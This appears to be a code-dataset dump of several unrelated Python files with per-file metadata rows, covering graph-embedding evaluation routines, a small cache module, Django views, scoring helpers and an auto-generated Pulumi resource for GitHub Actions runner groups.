lp_optimizer.step()
print("Link Predict finetune loss: {:.4f} Epoch {:05d} | Batch {:03d}".format(loss.item(), epoch, i))
if use_cuda:
lp_model.cpu()
train_g = train_g.to(torch.device("cpu"))
test_g=test_g.to(torch.device("cpu"))
pr_mrr= evaluation_link_prediction_wembeds(test_g, lp_model, embeddings, train_edges, valid_edges, test_edges, dim_size=n_hidden,
eval_neg_cnt=100,
n_layers=n_layers,
device=torch.device("cpu"))
if use_cuda:
train_g = train_g.to(device)
return pr_mrr
def macro_micro_f1(y_test, y_pred):
macro_f1 = f1_score(y_test, y_pred, average='macro')
micro_f1 = f1_score(y_test, y_pred, average='micro')
print("Macro micro f1 " +str(macro_f1)+ " "+str(micro_f1))
return macro_f1, micro_f1
def kmeans_test(X, y, n_clusters, repeat=10):
nmi_list = []
ari_list = []
for _ in range(repeat):
kmeans = KMeans(n_clusters=n_clusters)
y_pred = kmeans.fit_predict(X)
nmi_score = normalized_mutual_info_score(y, y_pred, average_method='arithmetic')
ari_score = adjusted_rand_score(y, y_pred)
nmi_list.append(nmi_score)
ari_list.append(ari_score)
return np.mean(nmi_list), np.std(nmi_list), np.mean(ari_list), np.std(ari_list)
def svm_test(X, y, test_sizes=(0.2, 0.4, 0.6, 0.8), repeat=10):
random_states = [182318 + i for i in range(repeat)]
result_macro_f1_list = []
result_micro_f1_list = []
for test_size in test_sizes:
macro_f1_list = []
micro_f1_list = []
for i in range(repeat):
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=test_size, shuffle=True, random_state=random_states[i])
svm = LinearSVC(dual=False)
svm.fit(X_train, y_train)
y_pred = svm.predict(X_test)
macro_f1 = f1_score(y_test, y_pred, average='macro')
micro_f1 = f1_score(y_test, y_pred, average='micro')
macro_f1_list.append(macro_f1)
micro_f1_list.append(micro_f1)
result_macro_f1_list.append((np.mean(macro_f1_list), np.std(macro_f1_list)))
result_micro_f1_list.append((np.mean(micro_f1_list), np.std(micro_f1_list)))
return result_macro_f1_list, result_micro_f1_list
def evaluate_results_nc(embeddings, labels, num_classes):
print('SVM test')
svm_macro_f1_list, svm_micro_f1_list = svm_test(embeddings, labels)
macro_str='Macro-F1: ' + ', '.join(['{:.6f}~{:.6f} ({:.1f})'.format(macro_f1_mean, macro_f1_std, train_size) for
(macro_f1_mean, macro_f1_std), train_size in
zip(svm_macro_f1_list, [0.8, 0.6, 0.4, 0.2])])
micro_str='Micro-F1: ' + ', '.join(['{:.6f}~{:.6f} ({:.1f})'.format(micro_f1_mean, micro_f1_std, train_size) for
(micro_f1_mean, micro_f1_std), train_size in
zip(svm_micro_f1_list, [0.8, 0.6, 0.4, 0.2])])
print(macro_str)
print(micro_str)
print('K-means test')
nmi_mean, nmi_std, ari_mean, ari_std = kmeans_test(embeddings, labels, num_classes)
print('NMI: {:.6f}~{:.6f}'.format(nmi_mean, nmi_std))
print('ARI: {:.6f}~{:.6f}'.format(ari_mean, ari_std))
return svm_macro_f1_list, svm_micro_f1_list, nmi_mean, nmi_std, ari_mean, ari_std,macro_str,micro_str
class Dataset(th.utils.data.Dataset):
'Characterizes a dataset for PyTorch'
def __init__(self, list_IDs, labels,features):
'Initialization'
self.labels = labels
self.list_IDs = list_IDs
self.features=features
def __len__(self):
'Denotes the total number of samples'
return len(self.list_IDs)
def __getitem__(self, index):
'Generates one sample of data'
# Select sample
ID = self.list_IDs[index]
# Load data and get label
X =self.features[ID]
y = self.labels[ID]
return X, y
def dcg_at_k(r, k):
r = np.asfarray(r)[:k]
if r.size:
return r[0] + np.sum(r[1:] / np.log2(np.arange(2, r.size + 1)))
return 0.
def ndcg_at_k(r, k):
dcg_max = dcg_at_k(sorted(r, reverse=True), k)
if not dcg_max:
return 0.
return dcg_at_k(r, k) / dcg_max
def _compute_acc(logits, labels, multilabel):
if multilabel:
valid_res = []
for ai, bi in zip(labels, logits.argsort(descending = True)):
valid_res += [(ai[bi.cpu().numpy()]).cpu().numpy()]
valid_ndcg = np.average([ndcg_at_k(resi, len(resi)) for resi in valid_res])
return valid_ndcg
else:
return th.sum(logits.argmax(dim=1).cpu() == labels.cpu()).item() / len(labels)
def compute_acc(results, labels, multilabel):
"""
Compute the accuracy of prediction given the labels.
"""
if multilabel:
return _compute_acc(results, labels, multilabel)
else:
labels = labels.long()
return (results == labels).float().sum() / len(results)
def mlp_classifier(args,feats,use_cuda,n_hidden,lr_d,
n_cepochs,multilabel,num_classes,
labels,train_idx,val_idx,test_idx,device
,batch_size=512):
###
# Use the encoded features for classification
# Here we initialize the features using the reconstructed ones
# feats = g.nodes[category].data['features']
l2norm = 0.0001
inp_dim = feats.shape[1]
model = ClassifierMLP(input_size=inp_dim, hidden_size=n_hidden,out_size=num_classes)
if use_cuda:
model.cuda()
feats=feats.cuda()
params = {'batch_size': batch_size,
'shuffle': True,
'num_workers': 0}
# Generators
training_set = Dataset(train_idx, labels,feats)
training_generator = th.utils.data.DataLoader(training_set, **params)
validation_set = Dataset(val_idx, labels,feats)
validation_generator = th.utils.data.DataLoader(validation_set, **params)
# optimizer
optimizer = torch.optim.Adam(model.parameters(), lr=lr_d, weight_decay=l2norm)
# training loop
print("start training...")
forward_time = []
backward_time = []
model.train()
# TODO find all zero indices rows and remove.
if len(labels.shape)>1:
zero_rows=np.where(~(labels).cpu().numpy().any(axis=1))[0]
train_idx=np.array(list(set(train_idx).difference(set(zero_rows))))
val_idx = np.array(list(set(val_idx).difference(set(zero_rows))))
test_idx = np.array(list(set(test_idx).difference(set(zero_rows))))
train_indices = torch.tensor(train_idx).to(device).long()
valid_indices = torch.tensor(val_idx).to(device).long()
test_indices = torch.tensor(test_idx).to(device).long()
best_val_acc = 0
best_test_acc = 0
labels_n=labels
if multilabel is False:
loss_func = torch.nn.CrossEntropyLoss()
else:
if args.klloss:
loss_func = torch.nn.KLDivLoss(reduction='batchmean')
else:
loss_func = torch.nn.BCEWithLogitsLoss()
for epoch in range(n_cepochs):
for local_batch, local_labels in training_generator:
optimizer.zero_grad()
logits = model(local_batch)
local_labels =local_labels.to(device)
if args.klloss and multilabel:
logits=torch.log_softmax(logits.squeeze(), dim=-1)
loss = loss_func(logits, (local_labels))
loss.backward()
optimizer.step()
#train_acc = compute_acc(results=pred, labels=local_labels, multilabel=multilabel)
if epoch%2==0:
pred = model(feats)
if multilabel is False:
pred = pred.argmax(dim=1)
else:
if args.klloss and multilabel:
pred=torch.log_softmax(pred.squeeze(), dim=-1)
train_acc = compute_acc(results= pred[train_indices],labels=labels[train_indices],multilabel=multilabel)
val_acc = compute_acc(results=pred[valid_indices], labels=labels[valid_indices], multilabel=multilabel)
test_acc = compute_acc(results=pred[test_indices], labels=labels[test_indices], multilabel=multilabel)
if best_val_acc < val_acc:
best_val_acc = val_acc
best_test_acc = test_acc
if epoch % 5 == 0:
print('Epoch '+str (epoch))
print(' Train Acc %.4f, Val Acc %.4f (Best %.4f), Test Acc %.4f (Best %.4f)' % (
train_acc.item() if th.is_tensor(train_acc) else train_acc,
val_acc.item() if th.is_tensor(val_acc) else val_acc,
best_val_acc.item() if th.is_tensor(best_val_acc) else best_val_acc,
test_acc.item() if th.is_tensor(test_acc) else test_acc,
best_test_acc.item() if th.is_tensor(best_test_acc) else best_test_acc
))
print()
return best_test_acc | 53.456722 | 141 | 0.509956 | 6,915 | 58,054 | 3.902965 | 0.056399 | 0.029568 | 0.022231 | 0.016599 | 0.791137 | 0.762866 | 0.750861 | 0.744637 | 0.733669 | 0.733669 | 0 | 0.016712 | 0.402177 | 58,054 | 1,086 | 142 | 53.456722 | 0.760935 | 0.022272 | 0 | 0.753439 | 0 | 0.001058 | 0.01473 | 0 | 0.002116 | 0 | 0 | 0.001842 | 0.006349 | 1 | 0.026455 | false | 0 | 0.013757 | 0 | 0.070899 | 0.019048 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
798566474472edcaa08f8e52ae1390d1c26ca7e9 | 94 | py | Python | tap_lever/streams/cache.py | luandy64/tap-lever | 68aa7bcb65b98d2e8c47adaa3679ce43a018b83b | [
"Apache-2.0"
] | null | null | null | tap_lever/streams/cache.py | luandy64/tap-lever | 68aa7bcb65b98d2e8c47adaa3679ce43a018b83b | [
"Apache-2.0"
] | 1 | 2019-11-06T15:35:03.000Z | 2019-11-06T17:00:27.000Z | tap_lever/streams/cache.py | luandy64/tap-lever | 68aa7bcb65b98d2e8c47adaa3679ce43a018b83b | [
"Apache-2.0"
] | 2 | 2019-06-10T19:34:38.000Z | 2020-06-30T21:20:36.000Z |
CACHE = {}
def add(key, val):
CACHE[key] = val
def get(key):
return CACHE.get(key)
| 10.444444 | 25 | 0.574468 | 15 | 94 | 3.6 | 0.466667 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.255319 | 94 | 8 | 26 | 11.75 | 0.771429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.2 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
7990acf040583f0177b4e2ad62a965cfae580ebf | 186 | py | Python | app/main/views.py | shift37/asx_gym | dd3d8dafae4f22ab9c9027bf362013255dbc6c36 | [
"RSA-MD"
] | null | null | null | app/main/views.py | shift37/asx_gym | dd3d8dafae4f22ab9c9027bf362013255dbc6c36 | [
"RSA-MD"
] | 3 | 2020-06-06T08:27:08.000Z | 2020-06-13T09:51:26.000Z | app/main/views.py | asxgym/asx_gym | 8b7745820c0d4cd59281acf7c003ec1f1938005a | [
"RSA-MD"
] | null | null | null | from django.views.generic import TemplateView
class IndexView(TemplateView):
template_name = "main/index.html"
class PriceView(TemplateView):
template_name = "main/price.html"
| 23.25 | 45 | 0.774194 | 22 | 186 | 6.454545 | 0.681818 | 0.28169 | 0.338028 | 0.394366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 186 | 7 | 46 | 26.571429 | 0.876543 | 0 | 0 | 0 | 0 | 0 | 0.16129 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
79b5d0ef9d0fbac54ad1f91b5d2391133bd869af | 2,033 | py | Python | src/ssh-kd/utils/eval.py | kiat/debs2019 | b1231a0995a154f8549ef23a00f635b81cc3c689 | [
"Apache-2.0"
] | null | null | null | src/ssh-kd/utils/eval.py | kiat/debs2019 | b1231a0995a154f8549ef23a00f635b81cc3c689 | [
"Apache-2.0"
] | 1 | 2018-12-11T23:19:14.000Z | 2018-12-12T06:39:53.000Z | src/ssh-kd/utils/eval.py | kiat/debs2019 | b1231a0995a154f8549ef23a00f635b81cc3c689 | [
"Apache-2.0"
] | 1 | 2021-05-06T21:54:47.000Z | 2021-05-06T21:54:47.000Z | from functools import reduce
def accuracy(a, b):
common_keys = set(a).intersection(b)
all_keys = set(a).union(b)
score = len(common_keys) / len(all_keys) #key score
if (score == 0):
return score, 'zero'
else: #value score
pred = {}
for k in common_keys:
pred[k] = b[k]
#true_values_sum = reduce(lambda x,y:int(x)+int(y),a.values())
all_keys = dict.fromkeys(all_keys, 0)
for k in a.keys():
all_keys.update({k:a[k]})
for k in b.keys():
all_keys.update({k:b[k]})
true_values_sum = reduce(lambda x,y:int(x)+int(y),all_keys.values())
pred_values_sum = reduce(lambda x,y:int(x)+int(y),pred.values())
val_score = int(pred_values_sum)/int(true_values_sum)
if score >= val_score:
return (score+val_score)/2,'avg'
else:
return score,'score'
def precision(a,b):
#return len(set(a).intersection(b))/len(a)
common_keys = set(a).intersection(b)
score = len(common_keys) / len(a)
if (score == 0):
return score
else:
pred = {}
for k in common_keys:
pred[k] = b[k]
true_values_sum = reduce(lambda x,y:int(x)+int(y),a.values())
pred_values_sum = reduce(lambda x,y:int(x)+int(y),pred.values())
val_score = int(pred_values_sum)/int(true_values_sum)
if score >= val_score:
return (score+val_score)/2
else:
return score
def recall(a,b):
common_keys = set(a).intersection(b)
score = len(common_keys)/len(b)
if (score == 0):
return score
else:
pred = {}
for k in common_keys:
pred[k] = b[k]
true_values_sum = reduce(lambda x,y:int(x)+int(y),b.values())
pred_values_sum = reduce(lambda x,y:int(x)+int(y),pred.values())
val_score = int(pred_values_sum)/int(true_values_sum)
if score >= val_score:
return (score+val_score)/2
else:
return score | 32.790323 | 76 | 0.567634 | 309 | 2,033 | 3.569579 | 0.135922 | 0.106074 | 0.082502 | 0.133273 | 0.805984 | 0.757026 | 0.737081 | 0.737081 | 0.708976 | 0.708976 | 0 | 0.004844 | 0.289228 | 2,033 | 62 | 77 | 32.790323 | 0.758478 | 0.06001 | 0 | 0.654545 | 0 | 0 | 0.006289 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054545 | false | 0 | 0.018182 | 0 | 0.236364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
79ce3138d019a740f67ced95d87081781bd7b506 | 19,832 | py | Python | sdk/python/pulumi_github/actions_runner_group.py | pulumi/pulumi-github | 303ed7a28cbfe6ba1db75b3b365dcfa0b00e6e91 | [
"ECL-2.0",
"Apache-2.0"
] | 20 | 2020-04-27T15:05:01.000Z | 2022-02-08T00:28:32.000Z | sdk/python/pulumi_github/actions_runner_group.py | pulumi/pulumi-github | 303ed7a28cbfe6ba1db75b3b365dcfa0b00e6e91 | [
"ECL-2.0",
"Apache-2.0"
] | 103 | 2020-05-01T17:36:32.000Z | 2022-03-31T15:26:35.000Z | sdk/python/pulumi_github/actions_runner_group.py | pulumi/pulumi-github | 303ed7a28cbfe6ba1db75b3b365dcfa0b00e6e91 | [
"ECL-2.0",
"Apache-2.0"
] | 4 | 2020-06-24T19:15:02.000Z | 2021-11-26T08:05:46.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ActionsRunnerGroupArgs', 'ActionsRunnerGroup']
@pulumi.input_type
class ActionsRunnerGroupArgs:
def __init__(__self__, *,
visibility: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None):
"""
The set of arguments for constructing a ActionsRunnerGroup resource.
:param pulumi.Input[str] visibility: Visibility of a runner group. Whether the runner group can include `all`, `selected`, or `private` repositories. A value of `private` is not currently supported due to limitations in the GitHub API.
:param pulumi.Input[str] name: Name of the runner group
:param pulumi.Input[Sequence[pulumi.Input[int]]] selected_repository_ids: IDs of the repositories which should be added to the runner group
"""
pulumi.set(__self__, "visibility", visibility)
if name is not None:
pulumi.set(__self__, "name", name)
if selected_repository_ids is not None:
pulumi.set(__self__, "selected_repository_ids", selected_repository_ids)
@property
@pulumi.getter
def visibility(self) -> pulumi.Input[str]:
"""
Visibility of a runner group. Whether the runner group can include `all`, `selected`, or `private` repositories. A value of `private` is not currently supported due to limitations in the GitHub API.
"""
return pulumi.get(self, "visibility")
@visibility.setter
def visibility(self, value: pulumi.Input[str]):
pulumi.set(self, "visibility", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the runner group
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="selectedRepositoryIds")
def selected_repository_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]:
"""
IDs of the repositories which should be added to the runner group
"""
return pulumi.get(self, "selected_repository_ids")
@selected_repository_ids.setter
def selected_repository_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]):
pulumi.set(self, "selected_repository_ids", value)
@pulumi.input_type
class _ActionsRunnerGroupState:
def __init__(__self__, *,
allows_public_repositories: Optional[pulumi.Input[bool]] = None,
default: Optional[pulumi.Input[bool]] = None,
etag: Optional[pulumi.Input[str]] = None,
inherited: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
runners_url: Optional[pulumi.Input[str]] = None,
selected_repositories_url: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
visibility: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ActionsRunnerGroup resources.
:param pulumi.Input[bool] allows_public_repositories: Whether public repositories can be added to the runner group
:param pulumi.Input[bool] default: Whether this is the default runner group
:param pulumi.Input[str] etag: An etag representing the runner group object
:param pulumi.Input[bool] inherited: Whether the runner group is inherited from the enterprise level
:param pulumi.Input[str] name: Name of the runner group
:param pulumi.Input[str] runners_url: The GitHub API URL for the runner group's runners
:param pulumi.Input[str] selected_repositories_url: Github API URL for the runner group's repositories
:param pulumi.Input[Sequence[pulumi.Input[int]]] selected_repository_ids: IDs of the repositories which should be added to the runner group
:param pulumi.Input[str] visibility: Visibility of a runner group. Whether the runner group can include `all`, `selected`, or `private` repositories. A value of `private` is not currently supported due to limitations in the GitHub API.
"""
if allows_public_repositories is not None:
pulumi.set(__self__, "allows_public_repositories", allows_public_repositories)
if default is not None:
pulumi.set(__self__, "default", default)
if etag is not None:
pulumi.set(__self__, "etag", etag)
if inherited is not None:
pulumi.set(__self__, "inherited", inherited)
if name is not None:
pulumi.set(__self__, "name", name)
if runners_url is not None:
pulumi.set(__self__, "runners_url", runners_url)
if selected_repositories_url is not None:
pulumi.set(__self__, "selected_repositories_url", selected_repositories_url)
if selected_repository_ids is not None:
pulumi.set(__self__, "selected_repository_ids", selected_repository_ids)
if visibility is not None:
pulumi.set(__self__, "visibility", visibility)
@property
@pulumi.getter(name="allowsPublicRepositories")
def allows_public_repositories(self) -> Optional[pulumi.Input[bool]]:
"""
Whether public repositories can be added to the runner group
"""
return pulumi.get(self, "allows_public_repositories")
@allows_public_repositories.setter
def allows_public_repositories(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "allows_public_repositories", value)
@property
@pulumi.getter
def default(self) -> Optional[pulumi.Input[bool]]:
"""
Whether this is the default runner group
"""
return pulumi.get(self, "default")
@default.setter
def default(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "default", value)
@property
@pulumi.getter
def etag(self) -> Optional[pulumi.Input[str]]:
"""
An etag representing the runner group object
"""
return pulumi.get(self, "etag")
@etag.setter
def etag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "etag", value)
@property
@pulumi.getter
def inherited(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the runner group is inherited from the enterprise level
"""
return pulumi.get(self, "inherited")
@inherited.setter
def inherited(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "inherited", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the runner group
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="runnersUrl")
def runners_url(self) -> Optional[pulumi.Input[str]]:
"""
The GitHub API URL for the runner group's runners
"""
return pulumi.get(self, "runners_url")
@runners_url.setter
def runners_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "runners_url", value)
@property
@pulumi.getter(name="selectedRepositoriesUrl")
def selected_repositories_url(self) -> Optional[pulumi.Input[str]]:
"""
Github API URL for the runner group's repositories
"""
return pulumi.get(self, "selected_repositories_url")
@selected_repositories_url.setter
def selected_repositories_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "selected_repositories_url", value)
@property
@pulumi.getter(name="selectedRepositoryIds")
def selected_repository_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]:
"""
IDs of the repositories which should be added to the runner group
"""
return pulumi.get(self, "selected_repository_ids")
@selected_repository_ids.setter
def selected_repository_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]):
pulumi.set(self, "selected_repository_ids", value)
@property
@pulumi.getter
def visibility(self) -> Optional[pulumi.Input[str]]:
"""
Visibility of a runner group. Whether the runner group can include `all`, `selected`, or `private` repositories. A value of `private` is not currently supported due to limitations in the GitHub API.
"""
return pulumi.get(self, "visibility")
@visibility.setter
def visibility(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "visibility", value)
class ActionsRunnerGroup(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
visibility: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
This resource allows you to create and manage GitHub Actions runner groups within your GitHub enterprise organizations.
You must have admin access to an organization to use this resource.
## Example Usage
```python
import pulumi
import pulumi_github as github
example_repository = github.Repository("exampleRepository")
example_actions_runner_group = github.ActionsRunnerGroup("exampleActionsRunnerGroup",
visibility="selected",
selected_repository_ids=[example_repository.repo_id])
```
## Import
This resource can be imported using the ID of the runner group
```sh
$ pulumi import github:index/actionsRunnerGroup:ActionsRunnerGroup test 7
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] name: Name of the runner group
:param pulumi.Input[Sequence[pulumi.Input[int]]] selected_repository_ids: IDs of the repositories which should be added to the runner group
:param pulumi.Input[str] visibility: Visibility of a runner group. Whether the runner group can include `all`, `selected`, or `private` repositories. A value of `private` is not currently supported due to limitations in the GitHub API.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ActionsRunnerGroupArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource allows you to create and manage GitHub Actions runner groups within your GitHub enterprise organizations.
You must have admin access to an organization to use this resource.
## Example Usage
```python
import pulumi
import pulumi_github as github
example_repository = github.Repository("exampleRepository")
example_actions_runner_group = github.ActionsRunnerGroup("exampleActionsRunnerGroup",
visibility="selected",
selected_repository_ids=[example_repository.repo_id])
```
## Import
This resource can be imported using the ID of the runner group
```sh
$ pulumi import github:index/actionsRunnerGroup:ActionsRunnerGroup test 7
```
:param str resource_name: The name of the resource.
:param ActionsRunnerGroupArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ActionsRunnerGroupArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
visibility: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ActionsRunnerGroupArgs.__new__(ActionsRunnerGroupArgs)
__props__.__dict__["name"] = name
__props__.__dict__["selected_repository_ids"] = selected_repository_ids
if visibility is None and not opts.urn:
raise TypeError("Missing required property 'visibility'")
__props__.__dict__["visibility"] = visibility
__props__.__dict__["allows_public_repositories"] = None
__props__.__dict__["default"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["inherited"] = None
__props__.__dict__["runners_url"] = None
__props__.__dict__["selected_repositories_url"] = None
super(ActionsRunnerGroup, __self__).__init__(
'github:index/actionsRunnerGroup:ActionsRunnerGroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
allows_public_repositories: Optional[pulumi.Input[bool]] = None,
default: Optional[pulumi.Input[bool]] = None,
etag: Optional[pulumi.Input[str]] = None,
inherited: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
runners_url: Optional[pulumi.Input[str]] = None,
selected_repositories_url: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
visibility: Optional[pulumi.Input[str]] = None) -> 'ActionsRunnerGroup':
"""
Get an existing ActionsRunnerGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] allows_public_repositories: Whether public repositories can be added to the runner group
:param pulumi.Input[bool] default: Whether this is the default runner group
:param pulumi.Input[str] etag: An etag representing the runner group object
:param pulumi.Input[bool] inherited: Whether the runner group is inherited from the enterprise level
:param pulumi.Input[str] name: Name of the runner group
:param pulumi.Input[str] runners_url: The GitHub API URL for the runner group's runners
:param pulumi.Input[str] selected_repositories_url: Github API URL for the runner group's repositories
:param pulumi.Input[Sequence[pulumi.Input[int]]] selected_repository_ids: IDs of the repositories which should be added to the runner group
:param pulumi.Input[str] visibility: Visibility of a runner group. Whether the runner group can include `all`, `selected`, or `private` repositories. A value of `private` is not currently supported due to limitations in the GitHub API.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ActionsRunnerGroupState.__new__(_ActionsRunnerGroupState)
__props__.__dict__["allows_public_repositories"] = allows_public_repositories
__props__.__dict__["default"] = default
__props__.__dict__["etag"] = etag
__props__.__dict__["inherited"] = inherited
__props__.__dict__["name"] = name
__props__.__dict__["runners_url"] = runners_url
__props__.__dict__["selected_repositories_url"] = selected_repositories_url
__props__.__dict__["selected_repository_ids"] = selected_repository_ids
__props__.__dict__["visibility"] = visibility
return ActionsRunnerGroup(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="allowsPublicRepositories")
def allows_public_repositories(self) -> pulumi.Output[bool]:
"""
Whether public repositories can be added to the runner group
"""
return pulumi.get(self, "allows_public_repositories")
@property
@pulumi.getter
def default(self) -> pulumi.Output[bool]:
"""
Whether this is the default runner group
"""
return pulumi.get(self, "default")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
An etag representing the runner group object
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def inherited(self) -> pulumi.Output[bool]:
"""
Whether the runner group is inherited from the enterprise level
"""
return pulumi.get(self, "inherited")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the runner group
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="runnersUrl")
def runners_url(self) -> pulumi.Output[str]:
"""
The GitHub API URL for the runner group's runners
"""
return pulumi.get(self, "runners_url")
@property
@pulumi.getter(name="selectedRepositoriesUrl")
def selected_repositories_url(self) -> pulumi.Output[str]:
"""
Github API URL for the runner group's repositories
"""
return pulumi.get(self, "selected_repositories_url")
@property
@pulumi.getter(name="selectedRepositoryIds")
def selected_repository_ids(self) -> pulumi.Output[Optional[Sequence[int]]]:
"""
IDs of the repositories which should be added to the runner group
"""
return pulumi.get(self, "selected_repository_ids")
@property
@pulumi.getter
def visibility(self) -> pulumi.Output[str]:
"""
Visibility of a runner group. Whether the runner group can include `all`, `selected`, or `private` repositories. A value of `private` is not currently supported due to limitations in the GitHub API.
"""
return pulumi.get(self, "visibility")
| 43.779249 | 243 | 0.662818 | 2,277 | 19,832 | 5.552481 | 0.081247 | 0.080044 | 0.072135 | 0.046983 | 0.816657 | 0.779325 | 0.723879 | 0.702207 | 0.689314 | 0.660682 | 0 | 0.0002 | 0.242739 | 19,832 | 452 | 244 | 43.876106 | 0.841657 | 0.33577 | 0 | 0.566802 | 1 | 0 | 0.108146 | 0.06149 | 0 | 0 | 0 | 0 | 0 | 1 | 0.161943 | false | 0.004049 | 0.020243 | 0 | 0.283401 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8dd4b763993c043f4b03fb0869ea15c704818756 | 201 | py | Python | multifil/aws/__init__.py | travistune3/multifil | 6e2a5d68dbdd7c7b5b6e50bdba92e6f7de3331fb | [
"MIT"
